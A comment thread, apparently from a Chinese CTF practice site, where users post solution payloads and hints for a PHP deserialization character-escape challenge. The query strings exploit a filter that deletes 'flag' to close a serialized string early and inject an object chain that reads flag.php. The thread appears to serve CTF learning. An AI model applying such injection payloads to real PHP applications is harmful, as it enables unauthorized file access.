?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
不容易啊
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
反序列化字符逃逸
...
评论
绝情且小帅 2月前
举报
?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}
xiaobai568 3月前
举报
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
zhaiye 7月前
举报
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
chaoge 8月前
举报
不容易啊
2728462336 9月前
举报
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
hopeinhand 10月前
举报
反序列化字符逃逸